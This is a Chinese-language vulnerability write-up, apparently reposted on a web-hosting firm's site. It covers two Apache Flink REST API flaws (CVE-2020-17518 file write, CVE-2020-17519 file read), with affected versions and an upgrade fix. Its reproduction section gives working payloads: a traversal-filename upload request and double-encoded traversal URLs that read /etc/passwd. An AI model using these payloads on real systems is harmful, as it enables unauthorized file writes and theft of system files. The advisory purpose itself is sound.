重庆分公司,新征程启航

为企业提供网站建设、域名注册、服务器等服务

ApacheFlink的文件漏洞是怎样的

这篇文章给大家介绍Apache Flink的文件漏洞是怎样的,内容非常详细,感兴趣的小伙伴们可以参考借鉴,希望对大家能有所帮助。

从网站建设到定制行业解决方案,为提供网站建设、网站制作服务体系,各种行业企业客户提供网站建设解决方案,助力业务快速发展。成都创新互联将不断加快创新步伐,提供优质的建站服务。

Apache Flink文件漏洞

一、漏洞描述

Apache Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。Flink 1.5.1引入了REST API,但其实现上存在多处缺陷,导致目录遍历。

CVE-2020-17518: 文件写入漏洞

攻击者利用REST API,可以修改HTTP头,将上传的文件写入到本地文件系统上的任意位置(Flink 1.5.1进程能访问到的)。

CVE-2020-17519: 文件读取漏洞

Apache Flink 1.11.0 允许攻击者通过JobManager进程的REST API读取JobManager本地文件系统上的任何文件(JobManager进程能访问到的) 。

二、影响版本

Apache Flink 1.5.1 ~ 1.11.2

三、漏洞复现

环境地址:

https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17518

1、CVE-2020-17518: 文件写入漏洞

POST/jars/uploadHTTP/1.1Host: IP:8081Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Connection: closeContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6YContent-Length: 189------WebKitFormBoundaryoZ8meKnrrso89R6YContent-Disposition: form-data; name="jarfile"; filename="../../../../../../../tmp/sucess"success------WebKitFormBoundaryoZ8meKnrrso89R6Y--

Apache Flink的文件漏洞是怎样的

访问:文件写入成功

http://ip+port/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fsucess

Apache Flink的文件漏洞是怎样的

2、CVE-2020-17519: 文件读取漏洞

http://IP:PORT/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

访问路径获取passwd

Apache Flink的文件漏洞是怎样的

四、修复建议

所有用户升级到Flink 1.11.3或1.12.0,下载链接为:

https://flink.apache.org/downloads.html

https://flink.apache.org/downloads.html

关于Apache Flink的文件漏洞是怎样的就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。


本文标题:ApacheFlink的文件漏洞是怎样的
网页网址:http://cqcxhl.cn/article/jjeihh.html

其他资讯

在线咨询
服务热线
服务热线:028-86922220
TOP